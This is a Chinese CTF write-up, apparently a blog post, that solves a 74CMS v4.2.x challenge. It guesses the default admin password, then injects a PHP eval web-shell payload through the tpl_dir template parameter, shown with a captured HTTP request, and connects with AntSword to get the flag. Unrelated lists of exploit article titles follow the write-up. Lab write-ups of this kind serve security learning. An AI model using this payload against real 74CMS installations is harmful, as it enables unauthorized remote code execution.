题目地址:

青少年CTF训练平台 | 原中学生CTF平台 | 青少年CTF

进入环境

拉到最下面查看网站cms版本

百度搜索

找个poc复现一下74CMS_v4.2.1-v4.2.129后台Getshell_FLy_鹏程万里的博客-CSDN博客

先进入网站后台/index.php?m=admin&c=index&a=login

输入账号aaa回显管理员账号不存在,试试admin

猜测账号就是admin了,貌似这里登录会验证,试试能不能爆破密码

302跳转登录成功密码就是admin

进入后台找到工具=>风格模板=>可用模板,抓包

GET /index.php?m=admin&c=tpl&a=set&tpl_dir=default HTTP/1.1
Host: 8b6402a9-5fae-4e93-89b9-713c9db37bec.challenge.qsnctf.com:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8b6402a9-5fae-4e93-89b9-713c9db37bec.challenge.qsnctf.com:8081/index.php?m=admin&c=tpl&a=index
Cookie: Hm_lvt_10309f8528ef7f3bdd779aa12ad6dc7e=1664077379,1664087665,1664100554; Hm_lpvt_10309f8528ef7f3bdd779aa12ad6dc7e=1664100567; td_cookie=1833576663; PHPSESSID=73nciph5rtj95ti9o99qd92781; think_language=zh-CN; think_template=default
Upgrade-Insecure-Requests: 1

修改tpl_dir的值为

','a',eval($_POST['cmd']),'

然后访问/Application/Home/Conf/config.php

蚁剑连接找到flag

骑士CMS01 74cms v4.2.111 后台getshell漏洞复现相关推荐

  1. Apache Axis2 后台文件上传getshell 漏洞复现

    0x00 前言 Apache Axis2是一个Web服务的核心支援引擎.AXIS2对旧有的AXIS重新设计及重写,并提供两种语言Java及C的开发版本. 事实上AXIS2 不只为WEB应用程序提供We ...

  2. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  3. 帝国CMS(EmpireCMS) v7.5 后台XSS漏洞复现与原理分析

    一.漏洞描述 该漏洞是由于代码只使用htmlspecialchars进行实体编码过滤,而且参数用的是ENT_QUOTES(编码双引号和单引号),还有addslashes函数处理,但是没有对任何恶意关键 ...

  4. qsnctf 骑士CMS01 wp

    题目提示弱口令 启动环境 查看cms版本 百度一下骑士cms的后台路径 /index.php?m=admin&c=index&a=login 进入后台 弱口令爆破 账号admin 得到 ...

  5. asp 退出登录修改cookie能进入后台_某logCMS的代码审计:越权到后台getshell

    某logCMS的代码审计:越权到后台getshell 前言 ​ 学习CTF这么久还没真正意义上审计过一款cms,这次决定花点时间去审计一款cms作为代码审计提升的跳板.由于相关要求,这里就省去cms全 ...

  6. php+sha512+漏洞,PhpMyWind最新版本注入+后台getshell

    转自http://wooyun.org/bugs/wooyun-2010-051256 洞主文中没说清楚,厂商也忽略了. 简要分析如下 漏洞出在/order.php中 [php] function G ...

  7. 通达oa wbupload.php,通达 OA 代码审计篇二 :11.8 后台 Getshell

    作者:LoRexxar'@知道创宇404实验室 日期:2021年3月9日 前篇中提到的漏洞在11.8版本中被完全修复后,我痛定思痛,从头开始找一个新的漏洞,于是就有了今天这个漏洞的诞生,但没想到的是, ...

  8. ThinkPHP 3.2.3~5.0.10 缓存函数设计缺陷后台GetShell实战

    0×00 前言 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,由于其简单易用,很多cms都基于该框架改写.然而 Thinkphp在缓存使用却存在缺陷,生成缓存时,Thinkph ...

  9. php后台提权,基于ThinkPHP的2个CMS后台GetShell利用

    * 本文作者:Mochazz,本文属FreeBuf原创奖励计划,未经许可禁止转载文章作者:Mochazz 思路作者:szrzvdny 0x00 前言 ThinkPHP是为了简化企业级应用开发和敏捷WE ...

  10. Emlog漏洞————Emlog数据库备份与导入功能导致后台getshell

    Emlog简介 Emlog是"Every Memory Log"的简介,意即:点滴记忆.它是一款基于PHP语言哈MYSQL数据库的开源.免费.功能强大的个人或多人联合撰写的博客系统 ...

最新文章

  1. 列表推导式 python原理_Python进阶-列表推导式详解总结
  2. 独家 | 使用机器学习对非结构化数据加速查询-第2部分(具有统计保证的近似选择查询)...
  3. 帝国cms后台模板编辑器辅助增强插件代码高亮格式化显示
  4. P1288 取数游戏II
  5. c++中堆、栈内存分配
  6. 【运维】详解 /etc/fstab
  7. 项目总结SpringMVC相关
  8. 命令行参数怎么输入_太好用了!谷歌开源的命令行接口工具fire
  9. oracle blob字段索引,在oracle 数据库中使用 Blob 字段存储 一张图片并读取
  10. python常用标准库的基本用法_[每天一个python小技巧]Python中标准库OS的常用方法总结...
  11. Java8新特性(二)——强大的Stream API
  12. 统计字符串、九宫格、编码问题
  13. Delphi Form Designer (窗体设计器)之一
  14. 软件工程 超市库存管理系统 设计报告
  15. 校园网页设计成品 学校班级网页制作模板 大学生静态HTML网页源码 dreamweaver网页作业 简单网页课程成品
  16. iis启动和停止的方法介绍
  17. eclipse 背景色
  18. Excel2007 不能清除剪贴板
  19. 理论+实验·MySQL数据库管理
  20. 电路原理笔记整理,电路知识点总结

热门文章

  1. 实验任务(四)---恶意代码技术
  2. OpenGL二十面体及多次细分成球体
  3. 产品经理如何写好一份简历
  4. 【腾讯地图】纯手写微信定位考勤小程序,内附完整源码!
  5. Linux内核学习路径
  6. multi task训练torch_torch中创建multitask网络结构
  7. XMAPP多端口配置
  8. 国有资产管理系统web
  9. MongoDB 下载和安装
  10. CentOS7详细安装教程--图文介绍超详细